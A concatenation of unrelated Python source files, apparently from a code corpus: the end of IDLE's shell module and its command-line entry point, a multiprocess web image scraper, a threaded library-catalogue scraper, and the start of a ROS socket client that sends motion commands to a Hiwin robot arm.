        s = re.sub(r'\n\s*$', '', s)
        lines = s.split('\n')
        self.text.undo_block_start()
        try:
            self.text.tag_remove("sel", "1.0", "end")
            self.text.mark_set("insert", "end-1c")
            prefix = self.text.get("insert linestart", "insert")
            if prefix.rstrip().endswith(':'):
                self.newline_and_indent_event(event)
                prefix = self.text.get("insert linestart", "insert")
            self.text.insert("insert", lines[0].strip())
            if len(lines) > 1:
                orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
                new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
                for line in lines[1:]:
                    if line.startswith(orig_base_indent):
                        # replace orig base indentation with new indentation
                        line = new_base_indent + line[len(orig_base_indent):]
                    self.text.insert('insert', '\n'+line.rstrip())
        finally:
            self.text.see("insert")
            self.text.undo_block_stop()

    def runit(self):
        """Submit the current input region to the interpreter."""
        line = self.text.get("iomark", "end-1c")
        # Strip off last newline and surrounding whitespace.
        # (To allow you to hit return twice to end a statement.)
        i = len(line)
        while i > 0 and line[i-1] in " \t":
            i = i-1
        if i > 0 and line[i-1] == "\n":
            i = i-1
        while i > 0 and line[i-1] in " \t":
            i = i-1
        line = line[:i]
        self.interp.runsource(line)

    def open_stack_viewer(self, event=None):
        if self.interp.rpcclt:
            return self.interp.remote_stack_viewer()
        try:
            sys.last_traceback
        except:
            tkMessageBox.showerror("No stack trace",
                "There is no stack trace yet.\n"
                "(sys.last_traceback is not defined)",
                parent=self.text)
            return
        from idlelib.stackviewer import StackBrowser
        StackBrowser(self.root, self.flist)

    def view_restart_mark(self, event=None):
        self.text.see("iomark")
        self.text.see("restart")

    def restart_shell(self, event=None):
        "Callback for Run/Restart Shell Cntl-F6"
        self.interp.restart_subprocess(with_cwd=True)

    def showprompt(self):
        self.resetoutput()
        self.console.write(self.prompt)
        self.text.mark_set("insert", "end-1c")
        self.set_line_and_column()
        self.io.reset_undo()

    def show_warning(self, msg):
        """Wrap *msg* to the shell width and insert it as stderr text."""
        width = self.interp.tkconsole.width
        wrapper = TextWrapper(width=width, tabsize=8, expand_tabs=True)
        wrapped_msg = '\n'.join(wrapper.wrap(msg))
        if not wrapped_msg.endswith('\n'):
            wrapped_msg += '\n'
        self.per.bottom.insert("iomark linestart", wrapped_msg, "stderr")

    def resetoutput(self):
        source = self.text.get("iomark", "end-1c")
        if self.history:
            self.history.store(source)
        if self.text.get("end-2c") != "\n":
            self.text.insert("end-1c", "\n")
        self.text.mark_set("iomark", "end-1c")
        self.set_line_and_column()
        self.ctip.remove_calltip_window()

    def write(self, s, tags=()):
        try:
            self.text.mark_gravity("iomark", "right")
            count = OutputWindow.write(self, s, tags, "iomark")
            self.text.mark_gravity("iomark", "left")
        except:
            raise  ###pass  # ### 11Aug07 KBK if we are expecting exceptions
                           # let's find out what they are and be specific.
        if self.canceled:
            self.canceled = False
            if not use_subprocess:
                raise KeyboardInterrupt
        return count

    def rmenu_check_cut(self):
        try:
            if self.text.compare('sel.first', '<', 'iomark'):
                return 'disabled'
        except TclError:  # no selection, so the index 'sel.first' doesn't exist
            return 'disabled'
        return super().rmenu_check_cut()

    def rmenu_check_paste(self):
        if self.text.compare('insert', '<', 'iomark'):
            return 'disabled'
        return super().rmenu_check_paste()
def fix_x11_paste(root):
    "Make paste replace selection on x11. See issue #5124."
    if root._windowingsystem == 'x11':
        for cls in 'Text', 'Entry', 'Spinbox':
            # Prepend a Tcl script that deletes the selection (if any)
            # before the stock <<Paste>> binding inserts the clipboard.
            root.bind_class(
                cls,
                '<<Paste>>',
                'catch {%W delete sel.first sel.last}\n' +
                root.bind_class(cls, '<<Paste>>'))
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (DEPRECATED,
see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print(sys.argv)" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print(sys.argv)" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
    """IDLE entry point: parse options, set up Tk, open editor/shell windows.

    Sets the module globals *flist*, *root* and *use_subprocess*, then
    runs the Tk mainloop until every IDLE window has been closed.
    """
    import getopt
    from platform import system
    from idlelib import testing  # bool value
    from idlelib import macosx

    global flist, root, use_subprocess

    capture_warnings(True)
    use_subprocess = True
    enable_shell = False
    enable_edit = False
    debug = False
    cmd = None
    script = None
    startup = False
    try:
        opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
    except getopt.error as msg:
        print("Error: %s\n%s" % (msg, usage_msg), file=sys.stderr)
        sys.exit(2)
    for o, a in opts:
        if o == '-c':
            cmd = a
            enable_shell = True
        if o == '-d':
            debug = True
            enable_shell = True
        if o == '-e':
            enable_edit = True
        if o == '-h':
            sys.stdout.write(usage_msg)
            sys.exit()
        if o == '-i':
            enable_shell = True
        if o == '-n':
            print(" Warning: running IDLE without a subprocess is deprecated.",
                  file=sys.stderr)
            use_subprocess = False
        if o == '-r':
            script = a
            if os.path.isfile(script):
                pass
            else:
                print("No script file: ", script)
                sys.exit()
            enable_shell = True
        if o == '-s':
            startup = True
            enable_shell = True
        if o == '-t':
            PyShell.shell_title = a
            enable_shell = True
    if args and args[0] == '-':
        # '-' means: run a script piped in on stdin.
        cmd = sys.stdin.read()
        enable_shell = True

    # process sys.argv and sys.path:
    for i in range(len(sys.path)):
        sys.path[i] = os.path.abspath(sys.path[i])
    if args and args[0] == '-':
        sys.argv = [''] + args[1:]
    elif cmd:
        sys.argv = ['-c'] + args
    elif script:
        sys.argv = [script] + args
    elif args:
        enable_edit = True
        pathx = []
        for filename in args:
            pathx.append(os.path.dirname(filename))
        for dir in pathx:
            dir = os.path.abspath(dir)
            if not dir in sys.path:
                sys.path.insert(0, dir)
    else:
        dir = os.getcwd()
        if dir not in sys.path:
            sys.path.insert(0, dir)

    # check the IDLE settings configuration (but command line overrides)
    edit_start = idleConf.GetOption('main', 'General',
                                    'editor-on-startup', type='bool')
    enable_edit = enable_edit or edit_start
    enable_shell = enable_shell or not enable_edit

    # Setup root.  Don't break user code run in IDLE process.
    # Don't change environment when testing.
    if use_subprocess and not testing:
        NoDefaultRoot()
    root = Tk(className="Idle")
    root.withdraw()
    from idlelib.run import fix_scaling
    fix_scaling(root)

    # set application icon
    icondir = os.path.join(os.path.dirname(__file__), 'Icons')
    if system() == 'Windows':
        iconfile = os.path.join(icondir, 'idle.ico')
        root.wm_iconbitmap(default=iconfile)
    elif not macosx.isAquaTk():
        if TkVersion >= 8.6:
            ext = '.png'
            sizes = (16, 32, 48, 256)
        else:
            ext = '.gif'
            sizes = (16, 32, 48)
        iconfiles = [os.path.join(icondir, 'idle_%d%s' % (size, ext))
                     for size in sizes]
        icons = [PhotoImage(master=root, file=iconfile)
                 for iconfile in iconfiles]
        root.wm_iconphoto(True, *icons)

    # start editor and/or shell windows:
    fixwordbreaks(root)
    fix_x11_paste(root)
    flist = PyShellFileList(root)
    macosx.setupApp(root, flist)

    if enable_edit:
        if not (cmd or script):
            for filename in args[:]:
                if flist.open(filename) is None:
                    # filename is a directory actually, disconsider it
                    args.remove(filename)
            if not args:
                flist.new()

    if enable_shell:
        shell = flist.open_shell()
        if not shell:
            return  # couldn't open shell
        if macosx.isAquaTk() and flist.dict:
            # On OSX: when the user has double-clicked on a file that causes
            # IDLE to be launched the shell window will open just in front of
            # the file she wants to see. Lower the interpreter window when
            # there are open files.
            shell.top.lower()
    else:
        shell = flist.pyshell

    # Handle remaining options. If any of these are set, enable_shell
    # was set also, so shell must be true to reach here.
    if debug:
        shell.open_debugger()
    if startup:
        filename = os.environ.get("IDLESTARTUP") or \
                   os.environ.get("PYTHONSTARTUP")
        if filename and os.path.isfile(filename):
            shell.interp.execfile(filename)
    if cmd or script:
        # Give the subprocess the same sys.argv the user asked for.
        shell.interp.runcommand("""if 1:
            import sys as _sys
            _sys.argv = %r
            del _sys
            \n""" % (sys.argv,))
        if cmd:
            shell.interp.execsource(cmd)
        elif script:
            shell.interp.prepend_syspath(script)
            shell.interp.execfile(script)
    elif shell:
        # If there is a shell window and no cmd or script in progress,
        # check for problematic issues and print warning message(s) in
        # the IDLE shell window; this is less intrusive than always
        # opening a separate window.

        # Warn if using a problematic OS X Tk version.
        tkversionwarning = macosx.tkVersionWarning(root)
        if tkversionwarning:
            shell.show_warning(tkversionwarning)

        # Warn if the "Prefer tabs when opening documents" system
        # preference is set to "Always".
        prefer_tabs_preference_warning = macosx.preferTabsPreferenceWarning()
        if prefer_tabs_preference_warning:
            shell.show_warning(prefer_tabs_preference_warning)

    while flist.inversedict:  # keep IDLE running while files are open.
        root.mainloop()
    root.destroy()
    capture_warnings(False)
if __name__ == "__main__":
    main()
    capture_warnings(False)  # Make sure turned off; see issue 18081
|
kaliya.py | """Kalia image web scraper
Uses multiple methods to download images from specific source
"""
__version__ = '0.7'
__author__ = 'axell'
import math
import os
import re
import sys
from multiprocessing import Process, active_children
from pathlib import Path
from time import gmtime, sleep, strftime
import click
import requests
from bs4 import BeautifulSoup
def echo(string):
    """Print *string*, ANSI-colorized by its leading tag word.

    The first word of the message (e.g. "WARNING" in "[WARNING] ...")
    selects a color; unrecognized or missing tags print the string
    unchanged.  Later on this could be set to point to file
    instead of stdout.
    """
    action = {
        "warning": f"\033[0;33m {string} \033[0m",
        "error": f"\033[0;31m {string} \033[0m",
        "succes": f"\033[92m {string} \033[0m",
    }
    match = re.search(r"\w+", string)
    # Guard: messages with no word character used to crash with
    # AttributeError on None.group().
    key = match.group().lower() if match else ""
    print(action.get(key, string))
def check_value(value, error_line):
    """Return *value* when truthy; otherwise report and raise ValueError."""
    if value:
        return value
    # FIXME: print rather variable than value
    echo(f"[Error] {error_line} \n {value or ''}")
    raise ValueError(f"Missing value, {error_line}")
def write_to_db(data):
    """Append *data* (a URL) to ~/.kaliya.list unless already recorded.

    No-op when *data* is falsy or already present in the file.
    """
    with open(f"{Path.home()}/.kaliya.list", "a+") as stream:
        # "a+" opens positioned at end-of-file: rewind before reading.
        stream.seek(0)
        current_data = [val.strip() for val in stream.readlines() if val]
        if not data or data in current_data:
            return
        # Seek to end-of-file before writing.  The old code did
        # stream.seek(2) -- absolute offset 2 -- and only worked because
        # append mode forces writes to the end anyway.
        stream.seek(0, 2)
        stream.write(f"{data}\n")
def print_from_db():
    """Print every recorded URL from ~/.kaliya.list, numbered.

    TODO: setup sqlite3 database https://docs.python.org/3.8/library/sqlite3.html
    TODO: DRY can I fix this?
    """
    # Two fixes vs. the original: the path string was missing its
    # f-prefix (it literally opened "f{str(Path.home())}/.kaliya.list"),
    # and readlines() ran before rewinding the "a+" handle, so the read
    # always started at end-of-file and returned nothing.
    with open(f"{Path.home()}/.kaliya.list", "a+") as stream:
        stream.seek(0)
        current_data = [x.strip() for x in stream.readlines() if x]
        for index, line in enumerate(current_data):
            echo(f"{index}): {line}")
def get_data_from_url_advanced(link):
    """Placeholder for a headless-browser based scrape of *link*.

    Currently always reports success and returns None; the pyppeteer
    implementation is still TODO.
    """
    echo(
        "[WARNING] Using tools to download content - this will take some time..."
    )
    if True:  # placeholder until the real success check exists
        echo("[SUCCES] Images had been found")
        # TODO: Here goes pypeteer data
    return None
def get_data_from_url_simple(url, secondary_mode=False):
    """Fetch *url* with a desktop browser User-Agent.

    Returns the requests.Response, or None on any failure (the error is
    echoed, not raised).  The scheme is normalized to plain http.
    *secondary_mode* is unused but kept for interface compatibility.
    """
    try:
        check_value(url, "Bad link")
        # Normalize to "http://rest".  The old code did
        # url.split('//')[1], which raised IndexError on scheme-less
        # URLs (silently swallowed below -> None) and truncated any URL
        # containing a second "//".
        parts = url.split('//', 1)
        url = f"http://{parts[1] if len(parts) > 1 else parts[0]}"
        headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
        return requests.get(url, headers=headers)
    except Exception as err:
        echo(f"[Error] {err}")
def find_images_in_website_data(soup, website_data, website_url):
    """Collect downloadable image URLs from parsed page *soup*.

    Absolute or protocol-relative image links are kept as-is; bare file
    names are resolved against *website_url*.  *website_data* is unused
    but kept for interface compatibility.
    """
    parsed_link_data = [link.get("href") for link in soup.find_all("a", href=True)]
    parsed_img_data = [link.get("src") for link in soup.find_all("img")]
    found_url_images = []
    for data in (parsed_link_data + parsed_img_data):
        if not data:
            # <img> tags without src yield None; re.match(None) used to crash.
            continue
        if re.match(r"(?:https?:)?//[\w./\-]+\.(?:jpe?g|png|gif)", data):
            # The old pattern "[https?:]?//" was a one-character class,
            # so full "http://..." links never matched and were dropped.
            found_url_images.append(data)
        elif re.match(r"[-a-zA-Z\d]+\.(?:jpe?g|png|gif)", data):
            found_url_images.append(f"{website_url}/{data}")
    return found_url_images
def shut_down():
    """Terminate and join every live child worker process."""
    for process in active_children():
        echo(f"Shutting down process {process}")
        process.terminate()
        process.join()
def supported_format(magic_num):
    """Map a hex magic-number string to a known image format key.

    *magic_num* is an uppercase hex dump of a file's leading bytes;
    returns "jpeg", "png", "gif89a" or "gif87a", else None.
    """
    signatures = {
        "jpeg": {"magic_number": "FFD8", "size": 4},
        "png": {"magic_number": "89504E470D0A1A0A", "size": 16},
        "gif89a": {"magic_number": "474946383961", "size": 12},
        "gif87a": {"magic_number": "474946383761", "size": 12},
    }
    matches = (
        fmt for fmt, sig in signatures.items()
        if magic_num[:sig["size"]] == sig["magic_number"]
    )
    return next(matches, None)
def separate_data_into_proceses(parsed_data):
    """Yield successive chunks of *parsed_data*, at most 10 items each.

    One chunk is produced per worker process.  Fixes two defects of the
    original: an empty input no longer raises ZeroDivisionError, and
    trailing items are no longer silently dropped when the length is
    not an exact multiple of the computed chunk size (e.g. with 25
    items the old code yielded 8+8+8 and lost the 25th).
    """
    if not parsed_data:
        return
    proc_num = math.ceil(len(parsed_data) / 10)
    # ceil() here guarantees proc_num chunks cover the whole list.
    chunk_size = math.ceil(len(parsed_data) / proc_num)
    for start in range(0, len(parsed_data), chunk_size):
        yield parsed_data[start:start + chunk_size]
def create_image_file(directory, url):
    """Download *url* into *directory* if its content is a supported image.

    Skips files that already exist; validates by magic number rather
    than by file extension.
    """
    def detect_and_fix(link):
        # Should I really need to fix link here?
        return link

    def get_magic_num(data):
        # Uppercase hex dump of the first 8 bytes, e.g. "FFD8FFE0...".
        return "".join(["{:02X}".format(b) for b in data[:8]][:8])

    file_name = url.split('/')[-1]
    full_path = f"{directory}/{file_name}"
    if os.path.isfile(full_path):
        # Already downloaded on a previous run.
        return
    image_data = get_data_from_url_simple(detect_and_fix(url)).content
    if supported_format(get_magic_num(image_data)):
        with open(full_path, "wb") as image_file:
            image_file.write(image_data)
        echo(f"[{strftime('%H:%M:%S', gmtime())}] {full_path}")
    else:
        echo("[ERROR] Image not supported")
def download_images_from_url(url, workpath):
    """Scrape ``url`` for images and download them in parallel processes.

    Creates a folder named after the page title under ``workpath``, records
    the URL in the history DB, then fans the image links out (≈10 per
    worker) to child processes running ``loop``.
    """
    def parse_title(soup):
        # Derive a folder name from the page <title>; fall back to asking
        # the user when the page has none.
        try:
            title = soup.title.text
            # Drop path-like '-' separated fragments and reassemble
            # shortest-first.
            clean_data = [data.strip() for data in title.split('-') if not '/' in data]
            title = " ".join(sorted(clean_data, key=lambda x: len(x), reverse=False))
        except AttributeError:  # soup.title is None
            echo(
                "[WARNING] Sorry could not find page title.\nSet title: "
            )
            title = input("Set new title: ")
        return title

    website_data = get_data_from_url_simple(url)
    # check_value raises ValueError when the fetch returned None.
    soup = BeautifulSoup(
        check_value(website_data, "Not found web data").text,
        "html.parser"
    )
    workpath = f"{workpath}/{parse_title(soup)}"
    os.makedirs(workpath, exist_ok=True)
    echo("[SUCCES] Creating folder")
    found_parsed_img = find_images_in_website_data(soup, website_data, url)
    if not found_parsed_img:
        # Fall back to the headless-browser based search.
        echo(
            "[WARNING] No images found using advanced search"
        )
        found_parsed_img = get_data_from_url_advanced(url)
    check_value(found_parsed_img, "Didn't find any supported images:")
    write_to_db(url)
    for values in separate_data_into_proceses(found_parsed_img):
        try:
            Process(target=loop, args=(workpath,values)).start()
        except ValueError:
            continue
def loop(path, values):
    """Worker-process body: download every image link in ``values`` into ``path``."""
    check_value(values, "Bad input for process")
    for image_link in values:
        create_image_file(path, image_link)
@click.command()
@click.argument("urls", nargs=-1)
@click.option("-r", "--refresh", is_flag=True, help="Refresh script every 5 minutes to check for new images")
@click.option("-l", "--last", is_flag=True, help="Show history information about downloading images")
@click.option("-i", "--ignore", is_flag=True, help="Ignore title setup just use founded on site")
def main(urls, refresh, last, ignore):
    """CLI entry point: download images from every URL, optionally looping.

    NOTE(review): the ``ignore`` flag is declared but never used in this body.
    """
    def process_all_data(input_links):
        """
        If this goes second time for same data it will
        skip already data that exist locally
        """
        for link in input_links:
            try:
                download_images_from_url(link, Path.cwd())
            except ValueError:
                continue

    if last:
        # History mode: print the download DB and exit.
        print_from_db()
        return
    while True:
        process_all_data(urls)
        if not refresh:
            break
        sleep(300)  # re-scan every 5 minutes in refresh mode
if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        # Ctrl-C: terminate any still-running download workers before exit.
        shut_down()
        sys.exit()
|
parse.py | import httpx
import threading
from lxml.etree import HTML
from getAPT import getAuthor, getPT
class Book:
    """Scraper for the XMU library OPAC catalogue.

    Collects search results into ``self.ls`` using one thread per result
    page, and can fetch per-copy borrowing details for a single book.
    """

    def __init__(self, page=1):
        # Accumulated book records; appended to concurrently by the search
        # threads.  NOTE(review): list.append is atomic in CPython but there
        # is no explicit lock here — confirm if porting off CPython.
        self.ls = []
        # First results page to fetch.
        self.page = page

    def _searchBook(self, title, page, publisher, author, isbn, year, doctype, lang_code, sort, orderby, onlylendable):
        """Fetch one results page and append its records to ``self.ls``.

        Silently returns on a non-200 response (leaving ``self.ls``
        untouched and ``self.bookNum`` possibly unset).
        """
        searchUrl = "https://catalog.xmu.edu.cn/opac/openlink.php"
        params = {
            "title": title,
            "page": page,
            "publisher": publisher,
            "author": author,
            "isbn": isbn,
            "year": year,
            "doctype": doctype,
            "lang_code": lang_code,
            "sort": sort,
            "orderby": orderby,
            "onlylendable": onlylendable
        }
        searchResult = httpx.get(searchUrl, params=params)
        if searchResult.status_code != 200:
            return
        pageResult = HTML(searchResult.text)
        try:
            # Total hit count shown in the page header.
            self.bookNum = int(pageResult.xpath("//*[@class='book_article']/div[1]/p/strong/text()")[0])
        except IndexError:
            self.bookNum = 0
        recordList = pageResult.xpath("//li[@class='book_list_info']")
        for record in recordList:
            bookDetail = {}
            # searchUrl[:-12] strips "openlink.php" to get the site base URL.
            bookDetail["link"] = searchUrl[:-12] + record.xpath("./h3/a/@href")[0]
            bookDetail["name"] = record.xpath("./h3/a//text()")[0].replace("/", "").strip()
            bookDetail["author"] = getAuthor(record.xpath("./p/text()")[1])
            bookDetail["press"], bookDetail["publishTime"] = getPT(record.xpath("./p/text()")[2], bookDetail["author"])
            # NOTE(review): only the final character of the span text is
            # used, so counts >= 10 would be truncated — confirm the page
            # always shows single-digit counts.
            bookDetail["copyNum"] = int(record.xpath("./p/span/text()")[0].strip()[-1])
            bookDetail["availableNum"] = int(record.xpath("./p/span/text()")[1].strip()[-1])
            self.ls.append(bookDetail)

    def startSearchBook(self, title, publisher, author, isbn, year, doctype, lang_code, sort, orderby, onlylendable):
        """Search 20 consecutive result pages concurrently and merge results.

        NOTE(review): if every request fails, ``self.bookNum`` is never set
        and the final return raises AttributeError — confirm desired.
        """
        threads = []
        for i in range(self.page, self.page+20):
            t = threading.Thread(target=self._searchBook, kwargs={"title": title, "page": i, "publisher": publisher, "author": author, "isbn": isbn, "year": year, "doctype": doctype, "lang_code": lang_code, "sort": sort, "orderby": orderby, "onlylendable": onlylendable})
            threads.append(t)
            t.start()
        for t in threads:
            t.join()
        # Records are ordered by the numeric prefix of their name
        # (e.g. "12.Some Title"), then adjacent duplicates (same prefix)
        # are dropped.
        self.ls.sort(key=lambda some: int(some["name"].split(".")[0]))
        for i in range(len(self.ls)-1):
            if self.ls[i]["name"].split(".")[0] == self.ls[i+1]["name"].split(".")[0]:
                self.ls[i] = None
        self.ls = [book for book in self.ls if book is not None]
        return {"bookNum": self.bookNum, "recordInfo": self.ls}

    def getBookInfo(self, url):
        """Fetch per-copy borrowing details for the book at ``url``.

        Returns a list of dicts with index/id/volume/location/state keys;
        an empty list on any fetch or parse failure.
        """
        borrowInfo = []
        bookResult = httpx.get(url)
        if bookResult.status_code != 200:
            return borrowInfo
        bookPage = HTML(bookResult.text)
        try:
            copies = bookPage.xpath("//*[@class='whitetext']")
        except IndexError:
            return borrowInfo
        # Probe the first row; pages without a holdings table yield nothing.
        try:
            _ = copies[0].xpath("./td[1]/text()")[0].strip()
        except:
            return borrowInfo
        for copy in copies:
            borrowDetail = {}
            try:
                borrowDetail["index"] = copy.xpath("./td[1]/text()")[0].strip()
                borrowDetail["id"] = copy.xpath("./td[2]/text()")[0].strip()
                borrowDetail["volume"] = copy.xpath("./td[3]/text()")[0].strip()
                borrowDetail["location"] = copy.xpath("./td[4]/text()")[0].strip()
                borrowDetail["state"] = copy.xpath("./td[5]//text()")[0].strip()
            except:
                # Malformed row: keep whatever fields parsed so far.
                pass
            borrowInfo.append(borrowDetail)
        return borrowInfo
|
Hiwin_RT605_ArmCommand_Socket_20190627200136.py | #!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
#Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
    """Simple 6-DOF pose container: position (x, y, z) plus orientation
    angles (pitch, roll, yaw)."""

    def __init__(self, x, y, z, pitch, roll, yaw):
        # Store the pose components verbatim.
        self.x, self.y, self.z = x, y, z
        self.pitch, self.roll, self.yaw = pitch, roll, yaw


# Initial pose used before any command arrives.
pos = point(0.0, 36.8, 11.35, -90.0, 0.0, 0.0)
##------------class socket_cmd---------
class socket_data():
    """Bundle of command fields sent to the arm over the socket."""

    def __init__(self, grip, setvel, ra, delay, setboth, action, Speedmode):
        self.grip = grip            # gripper command
        self.setvel = setvel        # velocity setting
        self.ra = ra                # relative/absolute selector
        self.delay = delay          # delay time
        self.setboth = setboth      # control mode (pos / euler / both)
        self.action = action        # action type selector
        self.Speedmode = Speedmode  # fast/safe speed mode


# Shared command state, mutated by Arm_Mode / Speed_Mode.
socket_cmd = socket_data(0, 0.0, 0, 0, 0, 0, 0)
##-----------switch define------------##
class switch(object):
    """Tcl-style switch/case helper (ActiveState recipe).

    Iterating yields the ``match`` method exactly once; ``match`` returns
    True when the switch value is among its arguments, with no-argument
    calls acting as a default case and ``fall`` emulating fall-through.
    """

    def __init__(self, value):
        self.value = value
        self.fall = False  # set once a case matched (fall-through)

    def __iter__(self):
        """Return the match method once, then stop."""
        yield self.match
        # Fix: the original ended with ``raise StopIteration``, which under
        # PEP 479 (Python 3.7+) is converted into RuntimeError whenever no
        # case breaks out of the ``for case in switch(...)`` loop.  Simply
        # falling off the end of the generator stops iteration cleanly.

    def match(self, *args):
        """Indicate whether or not to enter a case suite."""
        if self.fall or not args:
            return True
        elif self.value in args:  # changed for v1.5, see below
            self.fall = True
            return True
        else:
            return False
##-----------client feedback arm state----------
class StateFeedback():
    """Arm state reported back over the client connection."""

    def __init__(self, ArmState, SentFlag):
        self.ArmState = ArmState  # state code written by Socket_feedback
        self.SentFlag = SentFlag  # acknowledgement flag (0/1)


# Shared feedback state, published by socket_talker.
state_feedback = StateFeedback(0, 0)
class client():
    """Thin TCP client wrapper around the arm-controller socket."""

    def __init__(self):
        #self.get_connect()
        pass

    def get_connect(self):
        # Connect to the arm controller at its fixed LAN address.
        self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.s.connect(('192.168.0.1', 8080))

    def send(self, msg):
        # Encode with utf-8 before sending; works for any str payload.
        self.s.send(msg.encode('utf-8'))

    def get_recieve(self):
        """Receive up to 1024 bytes and return them as raw bytes."""
        data = self.s.recv(1024)  # 1024 limits how much one recv reads
        # NOTE(review): the decode result is discarded, so this line is a
        # no-op; callers (Socket_feedback) index the raw bytes directly.
        data.decode('utf-8')
        return data

    def close(self):
        self.s.close()
#Socket = client()
def point_data(x, y, z, pitch, roll, yaw):
    """Store a pose received from the strategy side into the global ``pos``."""
    pos.x, pos.y, pos.z = x, y, z
    pos.pitch, pos.roll, pos.yaw = pitch, roll, yaw
##----------Arm Mode-------------###
def Arm_Mode(action, grip, ra, setvel, setboth):
    """Store an arm-mode command from the strategy side and flag it pending."""
    global arm_mode_flag
    # Copy every field into the shared command object in one shot.
    (socket_cmd.action, socket_cmd.grip, socket_cmd.ra,
     socket_cmd.setvel, socket_cmd.setboth) = (action, grip, ra, setvel, setboth)
    arm_mode_flag = True
    #Socket_command()
#Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode):
    """Record the requested speed mode (fast/safe) from the strategy side."""
    socket_cmd.Speedmode = speedmode
def socket_talker():
    """ROS server node: publish the arm state on 'chatter' at 10 Hz."""
    pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
    rospy.init_node(NAME)
    rate = rospy.Rate(10)  # 10hz
    print ("Ready to connect")
    while not rospy.is_shutdown():
        # hello_str = "hello world %s" % rospy.get_time()
        state = Int32MultiArray()
        # [arm state, sent-acknowledge flag], both updated by Socket_feedback.
        state.data = [state_feedback.ArmState,state_feedback.SentFlag]
        pub.publish(state)
        rate.sleep()
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command(s):
    """Translate the pending ``socket_cmd`` into a TCP command and send it.

    ``s`` must provide a ``send`` method (the ``client`` wrapper).  The
    built command string is kept in the module-global ``data``.
    NOTE(review): the inner loops reuse the name ``case``, shadowing the
    outer switch's matcher inside each action branch.
    """
    global arm_mode_flag,data
    # if arm_mode_flag == True:
    #     arm_mode_flag = False
    for case in switch(socket_cmd.action):
        #-------PtP Mode--------
        if case(Taskcmd.Action_Type.PtoP):
            # Point-to-point motion; payload depends on the control mode.
            for case in switch(socket_cmd.setboth):
                if case(Taskcmd.Ctrl_Mode.CTRL_POS):
                    data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                    break
                if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
                    data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                    break
                if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
                    data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                    break
            break
        #-------Line Mode--------
        if case(Taskcmd.Action_Type.Line):
            # Straight-line motion; same control-mode selection as PtoP.
            for case in switch(socket_cmd.setboth):
                if case(Taskcmd.Ctrl_Mode.CTRL_POS):
                    data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                    break
                if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
                    data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
                    break
                if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
                    data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
                    break
            break
        #-------Set arm velocity--------
        if case(Taskcmd.Action_Type.SetVel):
            data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
            break
        #-------Set arm delay time--------
        if case(Taskcmd.Action_Type.Delay):
            data = TCP.SetDelay(socket_cmd.grip,0)
            break
        #-------Set arm fast/safe speed mode--------
        if case(Taskcmd.Action_Type.Mode):
            data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
            break
